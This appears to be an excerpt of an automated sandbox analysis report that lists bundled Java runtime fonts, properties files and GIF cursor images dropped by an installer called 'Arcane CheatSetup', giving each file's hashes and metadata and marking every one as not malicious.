                                SHA-512:A43CF773A42B4CEBF4170A6C94060EA2602D2D7FA7F6500F69758A20DC5CC3ED1793C7CEB9B44CE8640721CA919D2EF7F9568C5AF58BA6E3CF88EAE19A95E796
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 13 tables, 1st "OS/2", 16 names, Macintosh, Copyright (c) 1999 by Bigelow & Holmes Inc.Lucida Sans TypewriterRegularLucida Sans Typewriter R
                                Category:dropped
                                Size (bytes):242700
                                Entropy (8bit):6.936925430880877
                                Encrypted:false
                                SSDEEP:3072:VwzZsJcCrn271g+UGFDUnrrHqMyBtlc3+fzx5R1zeqZdDgfSkecUfEDpEXzSyPMx:GWcCrn2C46Ak+naqaucYEDpEX3gZoO9
                                MD5:C1397E8D6E6ABCD727C71FCA2132E218
                                SHA1:C144DCAFE4FAF2E79CFD74D8134A631F30234DB1
                                SHA-256:D9D0AAB0354C3856DF81AFAC49BDC586E930A77428CB499007DDE99ED31152FF
                                SHA-512:DA70826793C7023E61F272D37E2CC2983449F26926746605C550E9D614ACBF618F73D03D0C6351B9537703B05007CD822E42E6DC74423CB5CC736B31458D33B1
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 15 tables, 1st "LTSH", 19 names, Macintosh, Copyright (c) 1999, 2001 by Bigelow & Holmes Inc. Pat. Des. 289,420.Lucida SansDemiboldLucida Sa
                                Category:dropped
                                Size (bytes):317896
                                Entropy (8bit):6.869598480468745
                                Encrypted:false
                                SSDEEP:6144:R5OO1ZjNDE7/MsTJ30otegK4zJwz3UhG5jXsrg2HLzYv7cf0R7o7+WX/ov2DG:bOO11CEo9xzJwljXsrhHQ7cMuX/16
                                MD5:5DD099908B722236AA0C0047C56E5AF2
                                SHA1:92B79FEFC35E96190250C602A8FED85276B32A95
                                SHA-256:53773357D739F89BC10087AB2A829BA057649784A9ACBFFEE18A488B2DCCB9EE
                                SHA-512:440534EB2076004BEA66CF9AC2CE2B37C10FBF5CC5E0DD8B8A8EDEA25E3613CE8A59FFCB2500F60528BBF871FF37F1D0A3C60396BC740CCDB4324177C38BE97A
                                Malicious:false
                                Preview:...........pLTSH_R.a........OS/2...........Vcmapz.$L.......Zcvt ...y...8...hfpgm..1.........glyf......\....hdmx..0A.......hhead..&..:H...6hhea......:....$hmtx.,Z:..:.....loca.~'...T.....maxp......n.... name..=%..n....Kpost$.#...s$..[?prep......d...a..........................................)........2'............'........ ....................".".............0.%...............%...........)....................... ......0 ..............................) ) ) ) ...........................................2.2.2.2.).......................................................'"'"'"1....0.........................................................................................................'.....'...........)..,...&,....#............./&.....&.&.$.....$...$........'....... ....)...."...,.......+.....'....).,.....-)..)................... ..."..................,.........(.........,........................../..2.......+.........,.#) .....................+..).........0......+...............,.,.,......
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 13 tables, 1st "OS/2", 16 names, Macintosh, Copyright (c) 1999, 2001 by Bigelow & Holmes Inc.Lucida Sans TypewriterBoldLucida Sans Typewrite
                                Category:dropped
                                Size (bytes):234068
                                Entropy (8bit):6.901545053424004
                                Encrypted:false
                                SSDEEP:6144:3BPS7w5KIMtYwqcO3GbA4MJcs2ME9UGQ2n9gM/oD:xVMtgcGGPMJcs4b9gM/4
                                MD5:A0C96AA334F1AEAA799773DB3E6CBA9C
                                SHA1:A5DA2EB49448F461470387C939F0E69119310E0B
                                SHA-256:FC908259013B90F1CBC597A510C6DD7855BF9E7830ABE3FC3612AB4092EDCDE2
                                SHA-512:A43CF773A42B4CEBF4170A6C94060EA2602D2D7FA7F6500F69758A20DC5CC3ED1793C7CEB9B44CE8640721CA919D2EF7F9568C5AF58BA6E3CF88EAE19A95E796
                                Malicious:false
                                Preview:...........POS/2..........VcmapW......4....cvt .M/.........fpgm..1.........glyf|......@....head.c....L...6hhea...........$hmtx.e.........tloca..h..."....xmaxp......7.... name......7.....post1..%..;h..I.prep.......4... .............3.......3...1.f................+...x.........B&H.. . ...D.]......`................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a....................................................................................................................................x...........~...............u.z.~.......................O.\...............................:.R.m...........:.[.... . . . " & 0 3 : < > D . . . . .!.!.!.!"!&!.!^!.!.".".".".".".".")"+"H"a"e#.#.#!%.%.%.%.%.%.%.%$%,%4%<%l%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.&<&@&B&`&c&f&k...................3...b.r.t....... ...............t.z.~.........................Q.^.............................!.@.`.p...........?.... . . . &
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc.Lucida BrightDemibold ItalicLucida Bright Demibold Itali
                                Category:dropped
                                Size (bytes):75124
                                Entropy (8bit):6.805969666701276
                                Encrypted:false
                                SSDEEP:1536:lww80sTGzcKHwxWL0T+qHi/sbA06PoNORsr5sOnD0OyuusGa7bs4J:lwL0i97WL0T+qHA9cOR05FD0Oyup74w
                                MD5:793AE1AB32085C8DE36541BB6B30DA7C
                                SHA1:1FD1F757FEBF3E5F5FBB7FBF7A56587A40D57DE7
                                SHA-256:895C5262CDB6297C13725515F849ED70609DBD7C49974A382E8BBFE4A3D75F8C
                                SHA-512:A92ADDD0163F6D81C3AEABD63FF5C293E71A323F4AEDFB404F6F1CDE7F84C2A995A30DFEC84A9CAF8FFAF8E274EDD0D7822E6AABB2B0608696A360CABFC866C6
                                Malicious:false
                                Preview:...........pLTSH.....#.....OS/2k.{........Vcmap.U.z...T...jcvt =jC.........fpgm..1.........glyf.......h...Jhdmx.......`..1.head..X.......6hhea...;.......$hmtx.b......... loca..\....0....maxp...:...D... name .7]...d....postM..A........prep.C.f....................).......).....d. ............................B&H..!. .3.D.\...... ................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~......................................................................................................P...T.@.....~.............&.. . . . . " & 0 : D t .!"!&"."."."."."."+"H"`"e%................3..... .............&.. . . . . & 0 9 D t .!"!&"."."."."."."+"H"`"d%................3.........W.......M...d...............1.....j.y........t.q._./.0.......v.t.r.p.g.T.....R..........................................................................................................
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,421.Lucida BrightRegularLucida Bright Regu
                                Category:dropped
                                Size (bytes):344908
                                Entropy (8bit):6.939775499317555
                                Encrypted:false
                                SSDEEP:6144:oBfQeUG2CCTufrmOufymM8hvFHp277tS9iZFYSATxNm:oNQ3vCCTcaFNJw7tSgYS82
                                MD5:630A6FA16C414F3DE6110E46717AAD53
                                SHA1:5D7ED564791C900A8786936930BA99385653139C
                                SHA-256:0FAAACA3C730857D3E50FBA1BBAD4CA2330ADD217B35E22B7E67F02809FAC923
                                SHA-512:0B7CDE0FACE982B5867AEBFB92918404ADAC7FB351A9D47DCD9FE86C441CACA4DD4EC22E36B61025092220C0A8730D292DA31E9CAFD7808C56CDBF34ECD05035
                                Malicious:false
                                Preview:...........pLTSHN..U..=....~OS/2...S.......Vcmap..tO...T....cvt =|t>.......tfpgm..1....`....glyf.J.........Jhdmx]......D....head.WD...h...6hhea.j.........$hmtxW.6|........loca............maxp......4.... nameJO....4....rpost..g...8,..M.prep.].O.......T.............).......).....d. .............."....`........B&H..@. ...D.]...... ................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~......................................................................................................|...........~.............&.u.z.~.......................O.\.....................:.R.m.......... . . . . " & 0 : D t .!"!&!.".%....................3.b.r.t....... .............&.t.z.~.........................Q.^...................!.@.`.p........ . . . . & 0 9 D t .!"!&!.".%....................3.^.p.t.v.........W.......M......................................................
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 18 tables, 1st "GDEF", 19 names, Macintosh, Copyright (c) 1999 by Bigelow & Holmes Inc. Pat. Des. 289,420.Lucida SansRegularLucida Sans Regu
                                Category:dropped
                                Size (bytes):698236
                                Entropy (8bit):6.892888039120645
                                Encrypted:false
                                SSDEEP:12288:6obn11t7t7DxT+3+OQ64cctiOAq12ZX/DmfT6R83Sd8uvx7wSnyER4ky+SH/KPKQ:6oTJZzHniOAZ783Sd8uvx7wSnyER4kyI
                                MD5:B75309B925371B38997DF1B25C1EA508
                                SHA1:39CC8BCB8D4A71D4657FC92EF0B9F4E3E9E67ADD
                                SHA-256:F8D877B0B64600E736DFE436753E8E11ACB022E59B5D7723D7D221D81DC2FCDE
                                SHA-512:9C792EF3116833C90103F27CFD26A175AB1EB11286959F77062893A2E15DE44D79B27E5C47694CBBA734CC05A9A5BEFA72E991C7D60EAB1495AAC14C5CAD901D
                                Malicious:false
                                Preview:........... GDEF..|.......GPOS.......L...HGSUB.f.........LTSH...........uOS/2.#GQ...,...Vcmap..4........4cvt .y..........fpgm.!&.........glyf. ..........hdmx...M...(...\head..........6hhea...........$hmtx.S........-.loca'.c......-.maxp...Y....... nameW..r........post.&-.........prep.........................).......).....d. ...................{........B&H..@. ...D.]......`................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~..........................................................................................................".....".~...............E.u.z.~.......................O.\...............................:.R.m.............9.M.T.p.:.[.... . F p . . .!8!.!.".#.#.#!$i%.%.%.%.%.%.%.%$%,%4%<%l%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.&.&.&.&.&<&@&B&`&c&f&k'.'.'''K'M'R'V'^'g'.'.'................ .3.....6.<.>.A.D.N.b.r.t......... .........P.......t.z.~
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 13 tables, 1st "OS/2", 16 names, Macintosh, Copyright (c) 1999 by Bigelow & Holmes Inc.Lucida Sans TypewriterRegularLucida Sans Typewriter R
                                Category:dropped
                                Size (bytes):242700
                                Entropy (8bit):6.936925430880877
                                Encrypted:false
                                SSDEEP:3072:VwzZsJcCrn271g+UGFDUnrrHqMyBtlc3+fzx5R1zeqZdDgfSkecUfEDpEXzSyPMx:GWcCrn2C46Ak+naqaucYEDpEX3gZoO9
                                MD5:C1397E8D6E6ABCD727C71FCA2132E218
                                SHA1:C144DCAFE4FAF2E79CFD74D8134A631F30234DB1
                                SHA-256:D9D0AAB0354C3856DF81AFAC49BDC586E930A77428CB499007DDE99ED31152FF
                                SHA-512:DA70826793C7023E61F272D37E2CC2983449F26926746605C550E9D614ACBF618F73D03D0C6351B9537703B05007CD822E42E6DC74423CB5CC736B31458D33B1
                                Malicious:false
                                Preview:...........POS/2...s.......`cmap..Rh...<....cvt m......@...<fpgm..1....|....glyf..;}...8....head.,j..2L...6hhea......2....$hmtx.....2.....loca.PB...H(....maxp.z....].... namex.R...].....post...Q..ax..I.prep.UJ....\.................).......).....d. ..............{.............B&H..@. ...D.\...... ........=..... ......................................................................................... !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~..................................................................................................................~...............u.z.~.......................O.\...............................:.R.m...........:.[.... . . . " & 0 3 : < > D . . . .!.!.!.!"!&!.!^!.!.".".".".".".".")"+"H"a"e#.#.#!%.%.%.%.%.%.%.%$%,%4%<%l%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.&<&@&B&`&c&f&k.........................3...b.r.t....... ...............t.z.~.........................Q.^.............................!.@.`.p...........?..
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,422.Lucida BrightDemiboldLucida Bright Dem
                                Category:dropped
                                Size (bytes):75144
                                Entropy (8bit):6.849420541001734
                                Encrypted:false
                                SSDEEP:768:H8Jwt1GIlZ6l0/9tRWhc0x/YxvsTjyIDXCrGU/tlDaKAgKrTLznvzDJIZmjFA0zG:Mwtze9xQcQ/LDaKAgK3LLvzFogbFt5WD
                                MD5:AF0C5C24EF340AEA5CCAC002177E5C09
                                SHA1:B5C97F985639E19A3B712193EE48B55DDA581FD1
                                SHA-256:72CEE3E6DF72AD577AF49C59DCA2D0541060F95A881845950595E5614C486244
                                SHA-512:6CE87441E223543394B7242AC0CB63505888B503EC071BBF7DB857B5C935B855719B818090305E17C1197DE882CCC90612FB1E0A0E5D2731F264C663EB8DA3F9
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,773.Lucida BrightItalicLucida Bright Itali
                                Category:dropped
                                Size (bytes):80856
                                Entropy (8bit):6.821405620058844
                                Encrypted:false
                                SSDEEP:1536:jw9ESkPFybxWj1V7zbPUoOPjp85rFqXpLboVklDNTc2Wt:jwZO0xWPTU7l85rFYpLbott
                                MD5:4D666869C97CDB9E1381A393FFE50A3A
                                SHA1:AA5C037865C563726ECD63D61CA26443589BE425
                                SHA-256:D68819A70B60FF68CA945EF5AD358C31829E43EC25024A99D17174C626575E06
                                SHA-512:1D1F61E371E4A667C90C2CE315024AE6168E47FE8A5C02244DBF3DF26E8AC79F2355AC7E36D4A81D82C52149197892DAED1B4C19241575256BB4541F8B126AE2
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):14331
                                Entropy (8bit):3.512673497574481
                                Encrypted:false
                                SSDEEP:96:W6Zh/3dzz8XIrN2r1CdaqRWtHwBWgvw0Jy/ArUsJzu0HI:W6jhGIwxCdaqWQBWgvw0JyorBJzu0o
                                MD5:6E378235FB49F30C9580686BA8A787AA
                                SHA1:2FC76D9D615A35244133FC01AB7381BA49B0B149
                                SHA-256:B4A0C0A98624C48A801D8EA071EC4A3D582826AC9637478814591BC6EA259D4A
                                SHA-512:58558A1F8D9D3D6F0E21B1269313FD6AC9A80A93CC093A5E8CDEC495855FCD2FC95A6B54FE59E714E89D9274654BB9C1CD887B3FB9D4B9D9C50E5C5983C571B8
                                Malicious:false
                                Preview:# Copyright (c) 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..# This properties file defines a Hijrah calendar variant...#..# Fields:..#..# <version> ::= 'version' '=' <version string>..# <id> ::= 'id' '=' <id string>..# <type> ::= 'type' '=' <type string>..# <iso-start> ::= 'iso-start' '=' <start date in the ISO calendar>..# <year> ::= <yyyy> '=' <nn nn nn nn nn nn nn nn nn nn nn nn>..#..# version ... (Required)..#..# id ... (Required)..# Identifies the Java Chronology..#..# type ... (Required)..# Identifies the type of calendar in the standard calendar ID scheme..# iso-start ... (Required)..# Specifies the corresponding ISO date to the first Hijrah day..# in the defined range of dates..#..# year ... (Required)..# Number of days for each month of a Hijrah year..# * Each line defines a ye
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):657
                                Entropy (8bit):4.993355967240905
                                Encrypted:false
                                SSDEEP:12:QcwmIzDpneoeoeoeoeoeoeoeoeoeoeoeoeoeoeoeoeoeoeoe9B7aEiwoXH3Eoe4Q:QhDpemaoXHIB5foMS1JUqf07f
                                MD5:9FD47C1A487B79A12E90E7506469477B
                                SHA1:7814DF0FF2EA1827C75DCD73844CA7F025998CC6
                                SHA-256:A73AEA3074360CF62ADEDC0C82BC9C0C36C6A777C70DA6C544D0FBA7B2D8529E
                                SHA-512:97B9D4C68AC4B534F86EFA9AF947763EE61AEE6086581D96CBF7B3DBD6FD5D9DB4B4D16772DCE6F347B44085CEF8A6EA3BFD3B84FBD9D4EF763CEF39255FBCE3
                                Malicious:false
                                Preview:# Copyright (c) 2001, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..# List of JVMs that can be used as an option to java, javac, etc...# Order is important -- first in this list is the default JVM...# NOTE that this both this file and its format are UNSUPPORTED and..# WILL GO AWAY in a future release...#..# You may also select a JVM in an arbitrary location with the..# "-XXaltjvm=<jvm_dir>" option, but that too is unsupported..# and may not be available in a future release...#..-client KNOWN..-server KNOWN..
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):657
                                Entropy (8bit):4.993355967240905
                                Encrypted:false
                                SSDEEP:12:QcwmIzDpneoeoeoeoeoeoeoeoeoeoeoeoeoeoeoeoeoeoeoe9B7aEiwoXH3Eoe4Q:QhDpemaoXHIB5foMS1JUqf07f
                                MD5:9FD47C1A487B79A12E90E7506469477B
                                SHA1:7814DF0FF2EA1827C75DCD73844CA7F025998CC6
                                SHA-256:A73AEA3074360CF62ADEDC0C82BC9C0C36C6A777C70DA6C544D0FBA7B2D8529E
                                SHA-512:97B9D4C68AC4B534F86EFA9AF947763EE61AEE6086581D96CBF7B3DBD6FD5D9DB4B4D16772DCE6F347B44085CEF8A6EA3BFD3B84FBD9D4EF763CEF39255FBCE3
                                Malicious:false
                                Preview:# Copyright (c) 2001, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..# List of JVMs that can be used as an option to java, javac, etc...# Order is important -- first in this list is the default JVM...# NOTE that this both this file and its format are UNSUPPORTED and..# WILL GO AWAY in a future release...#..# You may also select a JVM in an arbitrary location with the..# "-XXaltjvm=<jvm_dir>" option, but that too is unsupported..# and may not be available in a future release...#..-client KNOWN..-server KNOWN..
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):5.02145006262851
                                Encrypted:false
                                SSDEEP:24:n3lG0Bf4dJ0qEAmG620WKG0WBph8T2AGjGg0kz8lrbfOi7:3E0Bf4qrzrlWzy+ckUfP
                                MD5:01B94C63BD5E6D094E84FF3AD640FFBF
                                SHA1:5570F355456250B1EC902375B0257584DB2360AE
                                SHA-256:52845DEB58038B4375C30B75DD2053726872758C96597C7CC5D6CEF11F42A2BA
                                SHA-512:816BE2271CF3ECF10EE40E24A288CE302B2810010BEF76EFC0CE5746591955921B70F19005335F485D61A7B216DCCE0B06750831720DD426D07709154D5FAC7A
                                Malicious:false
                                Preview:#..#..# Cursors Properties file..#..# Names GIF89 sources for Custom Cursors and their associated HotSpots..#..# Note: the syntax of the property name is significant and is parsed..# by java.awt.Cursor..#..# The syntax is: Cursor.<name>.<geom>.File=win32_<filename>..# Cursor.<name>.<geom>.HotSpot=<x>,<y>..#. Cursor.<name>.<geom>.Name=<localized name>..#..Cursor.CopyDrop.32x32.File=win32_CopyDrop32x32.gif..Cursor.CopyDrop.32x32.HotSpot=0,0..Cursor.CopyDrop.32x32.Name=CopyDrop32x32..#..Cursor.MoveDrop.32x32.File=win32_MoveDrop32x32.gif..Cursor.MoveDrop.32x32.HotSpot=0,0..Cursor.MoveDrop.32x32.Name=MoveDrop32x32..#..Cursor.LinkDrop.32x32.File=win32_LinkDrop32x32.gif..Cursor.LinkDrop.32x32.HotSpot=0,0..Cursor.LinkDrop.32x32.Name=LinkDrop32x32..#..Cursor.CopyNoDrop.32x32.File=win32_CopyNoDrop32x32.gif..Cursor.CopyNoDrop.32x32.HotSpot=6,2..Cursor.CopyNoDrop.32x32.Name=CopyNoDrop32x32..#..Cursor.MoveNoDrop.32x32.File=win32_MoveNoDrop32x32.gif..Cursor.MoveNoDrop.32x32.Ho
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 32 x 32
                                Category:dropped
                                Size (bytes):153
                                Entropy (8bit):6.2813106319833665
                                Encrypted:false
                                SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 31 x 32
                                Category:dropped
                                Size (bytes):147
                                Entropy (8bit):6.147949937659802
                                Encrypted:false
                                SSDEEP:3:CruuU/XExlHrSauZKwM7Qt/wCvTjh2Azr8ptBNKtWXOh6WoXt2W:KP0UvEKwMcx3UAzADBNXOh6h9p
                                MD5:CC8DD9AB7DDF6EFA2F3B8BCFA31115C0
                                SHA1:1333F489AC0506D7DC98656A515FEEB6E87E27F9
                                SHA-256:12CFCE05229DBA939CE13375D65CA7D303CE87851AE15539C02F11D1DC824338
                                SHA-512:9857B329ACD0DB45EA8C16E945B4CFA6DF9445A1EF457E4B8B40740720E8C658301FC3AB8BDD242B7697A65AE1436FD444F1968BD29DA6A89725CDDE1DE387B8
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 31 x 32
                                Category:dropped
                                Size (bytes):165
                                Entropy (8bit):6.347455736310776
                                Encrypted:false
                                SSDEEP:3:CruuU/XExlHrBwM7Qt/wCvTjh2Azr8ptBNKtWwUzJ7Ful5u44JyYChWn:KP0URwMcx3UAzADBNwUlBul5TLYMWn
                                MD5:89CDF623E11AAF0407328FD3ADA32C07
                                SHA1:AE813939F9A52E7B59927F531CE8757636FF8082
                                SHA-256:13C783ACD580DF27207DABCCB10B3F0C14674560A23943AC7233DF7F72D4E49D
                                SHA-512:2A35311D7DB5466697D7284DE75BABEE9BD0F0E2B20543332FCB6813F06DEBF2457A9C0CF569449C37F371BFEB0D81FB0D219E82B9A77ACC6BAFA07499EAC2F7
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 32 x 32
                                Category:dropped
                                Size (bytes):153
                                Entropy (8bit):6.2813106319833665
                                Encrypted:false
                                SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 32 x 32
                                Category:dropped
                                Size (bytes):153
                                Entropy (8bit):6.2813106319833665
                                Encrypted:false
                                SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 32 x 32
                                Category:dropped
                                Size (bytes):153
                                Entropy (8bit):6.2813106319833665
                                Encrypted:false
                                SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):5.02145006262851
                                Encrypted:false
                                SSDEEP:24:n3lG0Bf4dJ0qEAmG620WKG0WBph8T2AGjGg0kz8lrbfOi7:3E0Bf4qrzrlWzy+ckUfP
                                MD5:01B94C63BD5E6D094E84FF3AD640FFBF
                                SHA1:5570F355456250B1EC902375B0257584DB2360AE
                                SHA-256:52845DEB58038B4375C30B75DD2053726872758C96597C7CC5D6CEF11F42A2BA
                                SHA-512:816BE2271CF3ECF10EE40E24A288CE302B2810010BEF76EFC0CE5746591955921B70F19005335F485D61A7B216DCCE0B06750831720DD426D07709154D5FAC7A
                                Malicious:false
                                Preview:#..#..# Cursors Properties file..#..# Names GIF89 sources for Custom Cursors and their associated HotSpots..#..# Note: the syntax of the property name is significant and is parsed..# by java.awt.Cursor..#..# The syntax is: Cursor.<name>.<geom>.File=win32_<filename>..# Cursor.<name>.<geom>.HotSpot=<x>,<y>..#. Cursor.<name>.<geom>.Name=<localized name>..#..Cursor.CopyDrop.32x32.File=win32_CopyDrop32x32.gif..Cursor.CopyDrop.32x32.HotSpot=0,0..Cursor.CopyDrop.32x32.Name=CopyDrop32x32..#..Cursor.MoveDrop.32x32.File=win32_MoveDrop32x32.gif..Cursor.MoveDrop.32x32.HotSpot=0,0..Cursor.MoveDrop.32x32.Name=MoveDrop32x32..#..Cursor.LinkDrop.32x32.File=win32_LinkDrop32x32.gif..Cursor.LinkDrop.32x32.HotSpot=0,0..Cursor.LinkDrop.32x32.Name=LinkDrop32x32..#..Cursor.CopyNoDrop.32x32.File=win32_CopyNoDrop32x32.gif..Cursor.CopyNoDrop.32x32.HotSpot=6,2..Cursor.CopyNoDrop.32x32.Name=CopyNoDrop32x32..#..Cursor.MoveNoDrop.32x32.File=win32_MoveNoDrop32x32.gif..Cursor.MoveNoDrop.32x32.Ho
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 31 x 32
                                Category:dropped
                                Size (bytes):168
                                Entropy (8bit):6.465243369905675
                                Encrypted:false
                                SSDEEP:3:CruuU/XExlHrZauowM7Qt/wCvTjh2Azr8ptBNKtWwUzJZmQYRNbC1MIQvEn:KP0UpawMcx3UAzADBNwUlZaCzn
                                MD5:694A59EFDE0648F49FA448A46C4D8948
                                SHA1:4B3843CBD4F112A90D112A37957684C843D68E83
                                SHA-256:485CBE5C5144CFCD13CC6D701CDAB96E4A6F8660CBC70A0A58F1B7916BE64198
                                SHA-512:CF2DFD500AF64B63CC080151BC5B9DE59EDB99F0E31676056CF1AFBC9D6E2E5AF18DC40E393E043BBBBCB26F42D425AF71CCE6D283E838E67E61D826ED6ECD27
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 32 x 32
                                Category:dropped
                                Size (bytes):153
                                Entropy (8bit):6.2813106319833665
                                Encrypted:false
                                SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                Malicious:false
